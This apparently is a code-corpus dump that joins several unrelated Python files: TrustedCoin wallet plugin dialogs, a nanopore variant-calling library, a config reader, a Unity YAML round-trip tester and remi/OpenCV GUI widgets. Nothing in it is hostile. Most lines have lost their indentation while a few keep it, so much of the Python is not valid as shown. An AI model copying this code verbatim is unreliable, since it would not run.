task = partial(self.request_billing_info, window.wallet)
return WaitingDialog(window, 'Getting billing information...', task,
on_finished)
@hook
def abort_send(self, window):
wallet = window.wallet
if not isinstance(wallet, self.wallet_class):
return
if wallet.can_sign_without_server():
return
if wallet.billing_info is None:
return True
return False
def settings_dialog(self, window):
self.waiting_dialog(window, partial(self.show_settings_dialog, window))
def show_settings_dialog(self, window, success):
if not success:
window.show_message(_('Server not reachable.'))
return
wallet = window.wallet
d = WindowModalDialog(window, _("TrustedCoin Information"))
d.setMinimumSize(500, 200)
vbox = QVBoxLayout(d)
hbox = QHBoxLayout()
logo = QLabel()
logo.setPixmap(QPixmap(":icons/trustedcoin-status.png"))
msg = _('This wallet is protected by TrustedCoin\'s two-factor authentication.') + '<br/>'\
+ _("For more information, visit") + " <a href=\"https://api.trustedcoin.com/#/electrum-help\">https://api.trustedcoin.com/#/electrum-help</a>"
label = QLabel(msg)
label.setOpenExternalLinks(1)
hbox.addStretch(10)
hbox.addWidget(logo)
hbox.addStretch(10)
hbox.addWidget(label)
hbox.addStretch(10)
vbox.addLayout(hbox)
vbox.addStretch(10)
msg = _('TrustedCoin charges a small fee to co-sign transactions. The fee depends on how many prepaid transactions you buy. An extra output is added to your transaction every time you run out of prepaid transactions.') + '<br/>'
label = QLabel(msg)
label.setWordWrap(1)
vbox.addWidget(label)
vbox.addStretch(10)
grid = QGridLayout()
vbox.addLayout(grid)
price_per_tx = wallet.price_per_tx
n_prepay = wallet.num_prepay(self.config)
i = 0
for k, v in sorted(price_per_tx.items()):
if k == 1:
continue
grid.addWidget(QLabel("Pay every %d transactions:"%k), i, 0)
grid.addWidget(QLabel(window.format_amount(v/k) + ' ' + window.base_unit() + "/tx"), i, 1)
b = QRadioButton()
b.setChecked(k == n_prepay)
b.clicked.connect(lambda b, k=k: self.config.set_key('trustedcoin_prepay', k, True))
grid.addWidget(b, i, 2)
i += 1
n = wallet.billing_info.get('tx_remaining', 0)
grid.addWidget(QLabel(_("Your wallet has {} prepaid transactions.").format(n)), i, 0)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def on_buy(self, window, k, v, d):
d.close()
if window.pluginsdialog:
window.pluginsdialog.close()
wallet = window.wallet
uri = "bpq:" + wallet.billing_info['billing_address'] + "?message=TrustedCoin %d Prepaid Transactions&amount="%k + str(Decimal(v)/100000000)
wallet.is_billing = True
window.pay_to_URI(uri)
window.payto_e.setFrozen(True)
window.message_e.setFrozen(True)
window.amount_e.setFrozen(True)
def accept_terms_of_use(self, window):
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Terms of Service")))
tos_e = TOS()
tos_e.setReadOnly(True)
vbox.addWidget(tos_e)
tos_received = False
vbox.addWidget(QLabel(_("Please enter your e-mail address")))
email_e = QLineEdit()
vbox.addWidget(email_e)
next_button = window.next_button
prior_button_text = next_button.text()
next_button.setText(_('Accept'))
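        # The Terms of Service are fetched on a worker thread; the result is handed back to the
        # Qt main thread through the TOS widget's tos_signal / error_signal connections below, so
        # the GUI is never touched from the background thread.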
def request_TOS():
try:
tos = server.get_terms_of_service()
except Exception as e:
import traceback
traceback.print_exc(file=sys.stderr)
tos_e.error_signal.emit(_('Could not retrieve Terms of Service:')
+ '\n' + str(e))
return
self.TOS = tos
tos_e.tos_signal.emit()
def on_result():
tos_e.setText(self.TOS)
nonlocal tos_received
tos_received = True
set_enabled()
def on_error(msg):
window.show_error(str(msg))
window.terminate()
def set_enabled():
valid_email = re.match(regexp, email_e.text()) is not None
next_button.setEnabled(tos_received and valid_email)
tos_e.tos_signal.connect(on_result)
tos_e.error_signal.connect(on_error)
t = Thread(target=request_TOS)
t.setDaemon(True)
t.start()
regexp = r"[^@]+@[^@]+\.[^@]+"
email_e.textChanged.connect(set_enabled)
email_e.setFocus(True)
window.exec_layout(vbox, next_enabled=False)
next_button.setText(prior_button_text)
return str(email_e.text())
def request_otp_dialog(self, window, _id, otp_secret):
vbox = QVBoxLayout()
if otp_secret is not None:
uri = "otpauth://totp/%s?secret=%s"%('trustedcoin.com', otp_secret)
l = QLabel("Please scan the following QR code in Google Authenticator. You may as well use the following key: %s"%otp_secret)
l.setWordWrap(True)
vbox.addWidget(l)
qrw = QRCodeWidget(uri)
vbox.addWidget(qrw, 1)
msg = _('Then, enter your Google Authenticator code:')
else:
label = QLabel(
"This wallet is already registered with TrustedCoin. "
"To finalize wallet creation, please enter your Google Authenticator Code. "
)
label.setWordWrap(1)
vbox.addWidget(label)
msg = _('Google Authenticator code:')
hbox = QHBoxLayout()
hbox.addWidget(WWLabel(msg))
pw = AmountEdit(None, is_int = True)
pw.setFocus(True)
pw.setMaximumWidth(50)
hbox.addWidget(pw)
vbox.addLayout(hbox)
cb_lost = QCheckBox(_("I have lost my Google Authenticator account"))
cb_lost.setToolTip(_("Check this box to request a new secret. You will need to retype your seed."))
vbox.addWidget(cb_lost)
cb_lost.setVisible(otp_secret is None)
def set_enabled():
b = True if cb_lost.isChecked() else len(pw.text()) == 6
window.next_button.setEnabled(b)
pw.textChanged.connect(set_enabled)
cb_lost.toggled.connect(set_enabled)
window.exec_layout(vbox, next_enabled=False,
raise_on_cancel=False)
return pw.get_amount(), cb_lost.isChecked()
|
variantCallingLib.py
|
#!/usr/bin/env python
"""Library for calling variants
"""
import sys
import os
import glob
import pandas as pd
import numpy as np
from random import shuffle
from .signalAlignLib import SignalAlignment
from .alignmentAnalysisLib import CallMethylation
from multiprocessing import Process, Queue, current_process, Manager
from signalalign.utils.parsers import read_fasta
from signalalign.utils.sequenceTools import reverse_complement
def randomly_select_alignments(path_to_alignments, max_alignments_to_use):
alignments = [x for x in glob.glob(path_to_alignments) if os.stat(x).st_size != 0]
if len(alignments) == 0:
print(("[error] Didn't find any alignment files here {}".format(path_to_alignments)))
sys.exit(1)
shuffle(alignments)
if len(alignments) < max_alignments_to_use:
return alignments
else:
return alignments[:max_alignments_to_use]
def get_forward_mask(list_of_alignments, suffix):
mask = []
for alignment in list_of_alignments:
if alignment.endswith(".backward.tsv{}".format(suffix)):
mask.append(False)
else:
mask.append(True)
return mask
def get_alignments_labels_and_mask(path_to_alignments, max, suffix=""):
alignments = randomly_select_alignments(path_to_alignments, max)
mask = get_forward_mask(alignments, suffix)
return alignments, mask
def get_reference_sequence(path_to_fasta):
seqs = []
for header, comment, sequence in read_fasta(path_to_fasta):
seqs.append(sequence)
assert len(seqs) > 0, "Didn't find any sequences in the reference file"
if len(seqs) > 1:
print("[NOTICE] Found more than one sequence in the reference file, using the first one")
return seqs[0]
def make_degenerate_reference(input_sequence, positions, forward_sequence_path, backward_sequence_path,
block_size=1):
"""
    input_sequence: string, input nucleotide sequence
    positions: iterable of sequence positions to replace with the degenerate character 'X', or None for no substitutions
    forward_sequence_path: string, path to write the substituted template (forward) sequence
    backward_sequence_path: string, path to write the substituted complement (backward) sequence
    block_size: not implemented, will be the size of the Ns to add (eg. NN = block_size 2)
    :return: True once both sequence files have been written
"""
complement_sequence = reverse_complement(dna=input_sequence, reverse=False, complement=True)
if positions is not None:
t_seq = list(input_sequence)
c_seq = list(complement_sequence)
for position in positions:
t_seq[position] = "X"
c_seq[position] = "X"
t_seq = ''.join(t_seq)
c_seq = ''.join(c_seq)
else:
t_seq = input_sequence
c_seq = complement_sequence
with open(forward_sequence_path, 'w') as f:
f.write("{seq}".format(seq=t_seq))
with open(backward_sequence_path, 'w') as f:
f.write("{seq}".format(seq=c_seq))
return True
def load_variant_call_data(file_path):
    data = pd.read_table(file_path,
                         usecols=(0, 1, 2, 3, 4, 5, 6),
                         names=['site', 'strand', 'pA', 'pC', 'pG', 'pT', 'read'],
                         dtype={'site': np.int64,
                                'strand': str,
                                'pA': np.float64,
                                'pC': np.float64,
                                'pG': np.float64,
                                'pT': np.float64,
                                'read': str,
                                })
    return data
def symbol_to_base(symbol):
return ["A", "C", "G", "T"][symbol]
def rc_probs(probs):
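    # Reverse-complement a [pA, pC, pG, pT] probability vector: swap A<->T and C<->G.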
return [probs[3], probs[2], probs[1], probs[0]]
def call_sites_with_marginal_probs(data, reference_sequence_string, min_depth=0, get_sites=False):
d = load_variant_call_data(data)
reference_sequence_list = list(reference_sequence_string)
candidate_sites = []
add_to_candidates = candidate_sites.append
for g, x in d.groupby("site"):
marginal_forward_p = pd.Series(0, ['pA', 'pC', 'pG', 'pT'])
marginal_backward_p = pd.Series(0, ['pA', 'pC', 'pG', 'pT'])
assert(len(x['site'].unique()) == 1)
site = x['site'].unique()[0]
if len(x['read']) < min_depth:
continue
for i, read in x.iterrows():
if ((read['read'].endswith(".forward.tsv") and read['strand'] == 't') or
(read['read'].endswith(".backward.tsv") and read['strand'] == 'c')):
direction = True
else:
direction = False
if direction:
marginal_forward_p += read[['pA', 'pC', 'pG', 'pT']]
else:
marginal_backward_p += read[['pA', 'pC', 'pG', 'pT']]
marginal_prob = marginal_forward_p + rc_probs(marginal_backward_p)
normed_marginal_probs = marginal_prob.map(lambda y: y / sum(marginal_prob))
        called_base = normed_marginal_probs.idxmax()[1]
if called_base != reference_sequence_list[site]:
if get_sites is False:
print(("Changing {orig} to {new} at {site} depth {depth}"
"".format(orig=reference_sequence_list[site], new=called_base, site=site, depth=len(x['read']))))
reference_sequence_list[site] = called_base
else:
print(("Proposing edit at {site} from {orig} to {new}, \n{probs}"
"".format(orig=reference_sequence_list[site], new=called_base, site=site,
probs=normed_marginal_probs)))
difference = normed_marginal_probs.max() - normed_marginal_probs["p" + reference_sequence_list[site]]
print(difference)
add_to_candidates((site, difference))
if get_sites is True:
return candidate_sites
else:
return ''.join(reference_sequence_list)
def aligner(work_queue, done_queue):
try:
for f in iter(work_queue.get, 'STOP'):
alignment = SignalAlignment(**f)
alignment.run()
except Exception as e:
        done_queue.put("%s failed with %s" % (current_process().name, str(e)))
def variant_caller(work_queue, done_queue):
try:
for f in iter(work_queue.get, 'STOP'):
c = CallMethylation(**f)
c.write()
except Exception as e:
        done_queue.put("%s failed with %s" % (current_process().name, str(e)))
def run_service(service, service_iterable, service_arguments, workers, iterable_argument):
# setup workers for multiprocessing
work_queue = Manager().Queue()
done_queue = Manager().Queue()
jobs = []
for x in service_iterable:
args = dict({iterable_argument: x},
**service_arguments)
work_queue.put(args)
for w in range(workers):
p = Process(target=service, args=(work_queue, done_queue))
p.start()
jobs.append(p)
work_queue.put('STOP')
for p in jobs:
p.join()
done_queue.put('STOP')
def make_reference_files_and_alignment_args(working_folder, reference_sequence_string, alignment_args,
n_positions=None):
# make paths for working txt files that contain this STEPs Ns
forward_reference = working_folder.add_file_path("forward_reference.txt")
backward_reference = working_folder.add_file_path("backward_reference.txt")
# make N-ed reference sequence for this iteration, writes the strings to files
check = make_degenerate_reference(reference_sequence_string, n_positions,
forward_reference, backward_reference)
assert check, "Problem making degenerate reference"
# perform alignment for this step
alignment_args["forward_reference"] = forward_reference
alignment_args["backward_reference"] = backward_reference
return True
def scan_for_proposals(working_folder, step, reference_sequence_string, list_of_fast5s, alignment_args, workers):
reference_sequence_length = len(reference_sequence_string)
assert reference_sequence_length > 0, "Got empty string for reference sequence."
# proposals will contain the sites that we're going to change to N
proposals = []
for s in range(step):
scan_positions = list(range(s, reference_sequence_length, step))
check = make_reference_files_and_alignment_args(working_folder, reference_sequence_string,
alignment_args, n_positions=scan_positions)
assert check, "Problem making degenerate reference for step {step}".format(step=s)
run_service(aligner, list_of_fast5s, alignment_args, workers, "in_fast5")
# alignments is the list of alignments to gather proposals from
alignments = [x for x in glob.glob(working_folder.path + "*.tsv") if os.stat(x).st_size != 0]
if len(alignments) == 0:
print(("[error] Didn't find any alignment files here {}".format(working_folder.path)))
sys.exit(1)
marginal_probability_file = working_folder.add_file_path("marginals.{step}.calls".format(step=s))
proposal_args = {
"sequence": None,
"out_file": marginal_probability_file,
"positions": {"forward": scan_positions, "backward": scan_positions},
"degenerate_type": alignment_args["degenerate"]
}
#for alignment in alignments:
# a = dict({"alignment_file": alignment}, **proposal_args)
# c = CallMethylation(**a)
# c.write()
run_service(variant_caller, alignments, proposal_args, workers, "alignment_file")
# get proposal sites
proposals += call_sites_with_marginal_probs(marginal_probability_file, reference_sequence_string,
min_depth=0, get_sites=True)
# remove old alignments
for f in glob.glob(working_folder.path + "*.tsv"):
os.remove(f)
# proposals is a list of lists containing (position, delta_prob) where position in the position in the
# reference sequence that is being proposed to be edited, and delta_prob is the difference in probability
# of the reference base to the proposed base
return proposals
def update_reference_with_marginal_probs(working_folder, proposals, reference_sequence_string, list_of_fast5s,
alignment_args, workers):
check = make_reference_files_and_alignment_args(working_folder, reference_sequence_string, alignment_args,
n_positions=proposals)
assert check, "[update_reference_with_marginal_probs]: problem making reference files and args dict"
run_service(aligner, list_of_fast5s, alignment_args, workers, "in_fast5")
alignments = [x for x in glob.glob(working_folder.path + "*.tsv") if os.stat(x).st_size != 0]
marginal_probability_file = working_folder.add_file_path("proposals.calls")
proposal_args = {
"sequence": None,
"out_file": marginal_probability_file,
"positions": {"forward": proposals, "backward": proposals},
"degenerate_type": alignment_args["degenerate"]
}
#for alignment in alignments:
# a = dict({"alignment_file": alignment}, **proposal_args)
# c = CallMethylation(**a)
# c.write()
run_service(variant_caller, alignments, proposal_args, workers, "alignment_file")
    # call the updated reference sequence using the marginal probabilities at the proposed sites
    updated_reference_sequence = call_sites_with_marginal_probs(marginal_probability_file, reference_sequence_string,
                                                                min_depth=0, get_sites=False)
# clean up
working_folder.remove_file(marginal_probability_file)
# remove old alignments
for f in glob.glob(working_folder.path + "*.tsv"):
os.remove(f)
return updated_reference_sequence
|
config_reader.py
|
import copy
import multiprocessing as mp
def process_configs(target, arg_parser, train_path=None, valid_path=None, log_path=None, save_path=None, seed=None):
    args, _ = arg_parser.parse_known_args()
    ctx = mp.get_context('spawn')
    for run_args, _run_config, _run_repeat in _yield_configs(arg_parser, args):
        if train_path is None:
            p = ctx.Process(target=target, args=(run_args,))
        else:
            p = ctx.Process(target=target, args=(run_args, train_path, valid_path, log_path, save_path, seed))
        p.start()
        p.join()
def _read_config(path):
lines = open(path).readlines()
runs = []
run = [1, dict()]
for line in lines:
stripped_line = line.strip()
# continue in case of comment
if stripped_line.startswith('#'):
continue
if not stripped_line:
if run[1]:
runs.append(run)
run = [1, dict()]
continue
if stripped_line.startswith('[') and stripped_line.endswith(']'):
repeat = int(stripped_line[1:-1])
run[0] = repeat
else:
key, value = stripped_line.split('=')
key, value = (key.strip(), value.strip())
run[1][key] = value
if run[1]:
runs.append(run)
return runs
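# Sketch of the config file format _read_config() understands; the keys shown are illustrative,
# any 'key = value' pairs accepted by the argument parser are allowed:
#   # lines starting with '#' are comments
#   [3]                   <- optional: repeat the following run 3 times
#   label = first_run
#   use_cuda = true
#
#   label = second_run    <- a blank line separates one run from the next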
def _convert_config(config):
config_list = []
for k, v in config.items():
if v.lower() == 'true':
config_list.append('--' + k)
elif v.lower() != 'false':
config_list.extend(['--' + k] + v.split(' '))
return config_list
def _yield_configs(arg_parser, args, verbose=True):
_print = (lambda x: print(x)) if verbose else lambda x: x
if args.config:
config = _read_config(args.config)
for run_repeat, run_config in config:
print("-" * 50)
print("Config:")
print(run_config)
args_copy = copy.deepcopy(args)
config_list = _convert_config(run_config)
run_args = arg_parser.parse_args(config_list, namespace=args_copy)
run_args_dict = vars(run_args)
# set boolean values
for k, v in run_config.items():
if v.lower() == 'false':
run_args_dict[k] = False
print("Repeat %s times" % run_repeat)
print("-" * 50)
for iteration in range(run_repeat):
_print("Iteration %s" % iteration)
_print("-" * 50)
yield run_args, run_config, run_repeat
else:
yield args, None, None
def _calibrate_yield_configs(arg_parser, args, verbose=False):
if args.config:
config = _read_config(args.config)
for run_repeat, run_config in config:
args_copy = copy.deepcopy(args)
config_list = _convert_config(run_config)
run_args = arg_parser.parse_args(config_list, namespace=args_copy)
run_args_dict = vars(run_args)
# set boolean values
for k, v in run_config.items():
if v.lower() == 'false':
run_args_dict[k] = False
for iteration in range(run_repeat):
yield run_args, run_config, run_repeat
else:
yield args, None, None
def _api_yield_configs(arg_parser, args, verbose=False):
if args.config:
config = _read_config(args.config)
for run_repeat, run_config in config:
args_copy = copy.deepcopy(args)
config_list = _convert_config(run_config)
run_args = arg_parser.parse_args(config_list, namespace=args_copy)
run_args_dict = vars(run_args)
# set boolean values
for k, v in run_config.items():
if v.lower() == 'false':
run_args_dict[k] = False
for iteration in range(run_repeat):
yield run_args, run_config, run_repeat
else:
yield args, None, None
|
commands.py
|
import re
from argparse import ArgumentParser
from multiprocessing import Pool, Manager, Process
from pathlib import Path
from .utils import UnityDocument
YAML_HEADER = '%YAML'
class UnityProjectTester:
"""
Class to run tests on a given Unity project folder
"""
AVAILABLE_COMMANDS = ('test_no_yaml_is_modified',)
def __init__(self):
self.options = None
def run(self):
top_parser = ArgumentParser()
subparser = top_parser.add_subparsers()
subparser.required = True
for cmd in UnityProjectTester.AVAILABLE_COMMANDS:
fn = getattr(self, cmd)
parser = subparser.add_parser(cmd, help=fn.__doc__)
parser.set_defaults(func=fn)
top_parser.add_argument('project_path', help='Path to the Unity project folder')
top_parser.add_argument('--exclude',
help='Exclude regexp when searching project files. Can be specified multiple times.',
default=None,
action='append')
top_parser.add_argument('--keep-changes',
help='If a file changes after serialization, do not revert the changes.',
default=False,
action='store_true')
top_parser.add_argument('--dry-run',
                                help='Don\'t modify any files.',
default=False,
action='store_true')
try:
self.options = top_parser.parse_args()
except TypeError:
top_parser.print_help()
return 2
# run given function
self.options.func()
def test_no_yaml_is_modified(self):
"""
Recurse the whole project folder looking for '.asset' files, load and save them all, and check that
there are no modifications
"""
if self.options.dry_run:
print("Dry-run mode enabled: YAMLs won't be dumped.")
if self.options.keep_changes:
print("Keep changes mode will not have any effect during dry run.")
elif self.options.keep_changes:
print("Keep changes mode enabled: Changes to files will be kept.")
project_path = Path(self.options.project_path)
asset_file_paths = [p for p in project_path.rglob('*.asset')]
print("Found {} '.asset' files".format(len(asset_file_paths)))
def is_path_included(path):
# compare regexp against absolute path
return not any(rexp.search(str(path.resolve())) for rexp in rexps)
if self.options.exclude is not None:
rexps = [re.compile(rexp) for rexp in self.options.exclude]
valid_file_paths = [p for p in filter(is_path_included, asset_file_paths)]
print("Excluded {} '.asset' files".format(len(asset_file_paths) - len(valid_file_paths)))
else:
valid_file_paths = asset_file_paths
file_results = []
with Manager() as manager:
print_queue = manager.Queue()
diff_list = manager.list()
queue_process = Process(target=UnityProjectTester.read_output, args=(print_queue,))
queue_process.start()
with Pool() as pool:
for f in valid_file_paths:
async_res = pool.apply_async(UnityProjectTester.open_and_save,
(f, print_queue, diff_list, self.options.keep_changes,
self.options.dry_run))
file_results.append((f, async_res))
pool.close()
pool.join()
# signal end of queue with None token
print_queue.put(None)
queue_process.join()
error_results = list(filter(lambda r: not r[1].successful(), file_results))
if len(error_results):
# raise the first exception
file_path, result = error_results[0]
print("Python process evaluating file {} failed with the following exception:".format(
file_path.resolve()), flush=True)
result.get()
if len(diff_list):
print("{} files are different now:".format(len(diff_list)))
print('\n'.join([str(f.resolve()) for f in diff_list]))
@staticmethod
def read_output(print_queue):
msg = print_queue.get()
while msg is not None:
print(msg, flush=True)
msg = print_queue.get()
@staticmethod
def open_and_save(asset_file_path, print_queue, diff_list, keep_changes=False, dry_run=False):
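        # Round-trip check for one '.asset' file: remember the original bytes, confirm the
        # '%YAML' header, load and re-dump the document through UnityDocument, then compare
        # bytes; changed files are recorded in diff_list and restored unless keep_changes is set.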
# check YAML version header, save original content
with open(str(asset_file_path), 'rb') as fp:
header = fp.read(len(YAML_HEADER))
try:
is_yaml_file = header.decode('utf-8') == YAML_HEADER
except UnicodeDecodeError:
is_yaml_file = False
finally:
if not is_yaml_file:
print_queue.put("Ignoring non-yaml file {}".format(asset_file_path))
return
else:
fp.seek(0)
print_queue.put("Processing {}".format(asset_file_path))
a_file_content = fp.read()
doc = UnityDocument.load_yaml(str(asset_file_path))
if dry_run:
return
try:
doc.dump_yaml()
with open(str(asset_file_path), 'rb') as fp:
b_file_content = fp.read()
# compare
if a_file_content != b_file_content:
diff_list.append(asset_file_path)
if not keep_changes:
with open(str(asset_file_path), 'wb') as fp:
fp.write(a_file_content)
except Exception:
with open(str(asset_file_path), 'wb') as fp:
fp.write(a_file_content)
raise
if __name__ == '__main__':
# None is considered successful
code = UnityProjectTester().run() or 0
exit(code)
|
toolbox_opencv.py
|
# -*- coding: utf-8 -*-
import remi
import remi.gui as gui
import cv2
from threading import Timer, Thread
import traceback
import time
def default_icon(name, view_w=1, view_h=0.6):
icon = gui.Svg(50,30)
icon.set_viewbox(-view_w/2,-view_h/2,view_w,view_h)
text = gui.SvgText(0,0,name)
text.style['font-size'] = "0.2px"
text.style['text-anchor'] = "middle"
stroke_width = 0.01
rect = gui.SvgRectangle(-view_w/2+stroke_width,-view_h/2+stroke_width,view_w-stroke_width*2,view_h-stroke_width*2)
rect.set_fill("none")
rect.set_stroke(0.01,'black')
icon.append([rect, text])
return icon
# noinspection PyUnresolvedReferences
class OpencvWidget(object):
def _setup(self):
#this must be called after the Widget super constructor
self.on_new_image.do = self.do
def do(self, callback, *userdata, **kwuserdata):
#this method gets called when an event is connected, making it possible to execute the process chain directly, before the event triggers
if hasattr(self.on_new_image.event_method_bound, '_js_code'):
self.on_new_image.event_source_instance.attributes[self.on_new_image.event_name] = self.on_new_image.event_method_bound._js_code%{
'emitter_identifier':self.on_new_image.event_source_instance.identifier, 'event_name':self.on_new_image.event_name}
self.on_new_image.callback = callback
self.on_new_image.userdata = userdata
self.on_new_image.kwuserdata = kwuserdata
#here the callback is called immediately to make it possible link to the plc
if callback is not None: #protection against the callback replacements in the editor
callback(self, *userdata, **kwuserdata)
@gui.decorate_set_on_listener("(self, emitter)")
@gui.decorate_event
def on_new_image(self):
return ()
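# Chaining sketch (file names are illustrative): one widget's on_new_image event can be wired to
# another widget's on_new_image_listener so frames flow down a processing chain:
#   source = OpencvImRead('input.png')
#   viewer = OpencvImRead('placeholder.png')
#   source.on_new_image.do(viewer.on_new_image_listener)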
class OpencvImRead(gui.Image, OpencvWidget):
""" OpencvImRead widget.
Allows to read an image from file.
The event on_new_image can be connected to other Opencv widgets for further processing
"""
icon = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADwAAAAuCAYAAAB04nriAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAFnQAABZ0B24EKIgAAABl0RVh0U29mdHdhcmUAd3d3Lmlua3NjYXBlLm9yZ5vuPBoAAATOSURBVGiB5ZpdbBRVFMd/d6ZlpVCKQEF48jtEQkyMiRFNjEZe9AHUxMQHg/HBQOKjJD7ogxojwcYHIKAEP7AaYpQPQb6hQqpdqgIWRIpbChWU7W63y3a7O9vdmbk+lG637LYz087druH3tLn33HPOf+fOvWfujFi+eK7kFkKb7ATKTdXQD6HpBObcMZm5KGOgJ4y0LaBAcPWseh5cu33SklLJ6TeWk+0JA7fylHbDNHqYJ/9AExbdLCLJ/+8WcCW4GoPHWM8jcjMCG26s6+08w0HxHga3q8zRV1wIljwvV3IXzUU9C9lHnfyHRvEdNrqC9PzH8R5exO6SYoeYTxsP8aWvSanEUfBYYvM20tmmUnAUPFN2OTqZxWU/cikLjoJj3OvoJMr9viRTDhwFh8RSRych8bQvyTjRYfxES2IrphwYtw/HVbqDpzjHMhbxfcn+Tp7gLC+MOwE35KTBt92raU83kZMZ2vr38OqCrQTENM++XFVae0UDx8VqckzNt5kECLKK7eITQHgO7JaEFebTf1/mbGofOZkB4O/MKXZF3x6XP1eFh41OkFW0iteYQwgNkwgLsb0Vap7pTJ9gT+wdwtkLRX3t6aNcTLdwT80STz49ZWyjE2GhpwDjIScNjvau42RyB/1WtKRNxkrSFF/P3TWPIjzMMLWXyCWmzBLLdRHJdtBpBOnMBIlkLzqO6xo4STCxlSV1r7iO5UmwQQJDJAjI6UylDm2C5eSp5E5+T+4ikguRNHuwMT2Nt6RJa982Hq59kSlajasxjoLDop1mfQtXtTOkiGOKDDrV3CZrmSHnMVveyX3ycRZbz7r+A+LmVXZF36LTaJ3QFgMQyYbYH1vDsvp3XdmPKbhJ30Cr/hV9IlLUlxbX6RVXuMxvnGYnx/RNPGAv5UnzdaqYMqrP86kj7I+tJZrrcJWgG86lDrJk5grqq+9xtB11WzpY9SHHqjaWFHszNhZhcYEmfQMbpzxHi/5FSbtfEtvYHn3TV7EASSvK/tgaV7YlBbfpuzmhfU2OjOfg18R59la9z2fVK0gTz7cHE40cijeQsno9+3TDxXQLZ1P7HO2KBA+IFEf19WRE37iD21iEtGY2V7/EJa2V4/GPORxvIGXFnQePk6w0aI5vwZJjL3xFgg/oa4kK5y3BDd3aXzTqKzlirsOwkr74HIur2TMcv75pTJsRgrOkCWn+PtsaWgJzfgbqfHVbEiltTiV30D/GbTNC8M/658TEZf8z0YF5QK3/rm8mluviQOyDUftHCO7UTqjLpAqYT1lEn0//yJVMW8m+vGCJTVgUF+m+MiR6qpPhxEhbvRyKN5TsywvOYdAvetRmAoOiF4DqQ85LRiu/9n1T1J4XbIqs2gwKCYDqM3xLmgQTjUWla16w18J9wtQC09WGuJb9k8O9H41oKxBsqY1+MxowR32Ytv4fsAuKkRGLVtmpAWarDZEwr2HYw1VjgeBJ+hBgJsoXMFMOPxNM/uvSADBXbYjCizn5ggFmMCi8DFSGYB3lV3mIyhAMg1uU4m0KKkmwQPmKDQWCvZztKqOGwVVbIQWCK+ANvgBmqQ2hDf+okNkdQGkFJvKfHmqCVH2Z6+nRkIAJftVCNQkdcaOQHD6XtiXTuitgWiumQuZx+fgPED6yi1RbbEEAAAAASUVORK5CYII="
@gui.decorate_constructor_parameter_types(["file"])
def __init__(self, filename, *args, **kwargs):
self.app_instance = None
default_style = {'position':'absolute','left':'10px','top':'10px'}
default_style.update(kwargs.get('style',{}))
kwargs['style'] = default_style
kwargs['width'] = kwargs['style'].get('width', kwargs.get('width','200px'))
kwargs['height'] = kwargs['style'].get('height', kwargs.get('height','180px'))
super(OpencvImRead, self).__init__("", *args, **kwargs)
OpencvWidget._setup(self)
self.frame_index = 0
self.set_image(filename)
def _need_update(self, emitter=None):
#overriding this method allows correcting the image url that gets updated by the editor
gui.Image.set_image(self, '/%(id)s/get_image_data?index=%(frame_index)s'% {'id': id(self), 'frame_index':0})
super(OpencvImRead, self)._need_update(emitter)
def on_new_image_listener(self, emitter):
if emitter.img is None:
return
self.set_image_data(emitter.img)
def set_image(self, filename):
self.set_image_data(cv2.imread(filename, cv2.IMREAD_COLOR)) # alternative: cv2.IMREAD_GRAYSCALE
def set_image_data(self, img):
self.img = img
self.update()
self.on_new_image()
def search_app_instance(self, node):
if issubclass(node.__class__, remi.server.App):
return node
if not hasattr(node, "get_parent"):
return None
return self.search_app_instance(node.get_parent())
def update(self, *args):
if self.app_instance==None:
self.app_instance = self.search_app_instance(self)
if self.app_instance==None:
return
self.frame_index = self.frame_index + 1
self.app_instance.execute_javascript("""
url = '/%(id)s/get_image_data?index=%(frame_index)s';
xhr = null;
xhr = new XMLHttpRequest();
xhr.open('GET', url, true);
xhr.responseType = 'blob'
xhr.onload = function(e){
urlCreator = window.URL || window.webkitURL;
urlCreator.revokeObjectURL(document.getElementById('%(id)s').src);
imageUrl = urlCreator.createObjectURL(this.response);
document.getElementById('%(id)s').src = imageUrl;
}
xhr.send();
""" % {'id': id(self), 'frame_index':self.frame_index})
def get_image_data(self, index=0):
try:
ret, png = cv2.imencode('.png', self.img)
if ret:
headers = {'Content-type': 'image/png'}
return [png.tostring(), headers]
except:
pass
#print(traceback.format_exc())
return None, None
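# --- added usage sketch (not part of the original widget set) ---
# A minimal sketch of how an OpencvImRead source can be chained to another
# widget through the on_new_image event. The "do" override above runs the
# callback immediately when the connection is made, so the processing chain is
# evaluated as soon as the widgets are wired together. The image path and the
# threshold value are illustrative assumptions; OpencvThreshold is defined
# further below in this file.
def _example_imread_chain():
    source = OpencvImRead('./example.png')    # hypothetical image path
    binarizer = OpencvThreshold(128)          # hypothetical threshold value
    # connecting the event also fires the callback once with the current image
    source.on_new_image.do(binarizer.on_new_image_listener)
    return source, binarizer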
class OpencvVideo(OpencvImRead):
""" OpencvVideo widget.
Opens a video source and dispatches each frame by generating the on_new_image event.
The event on_new_image can be connected to other Opencv widgets for further processing
"""
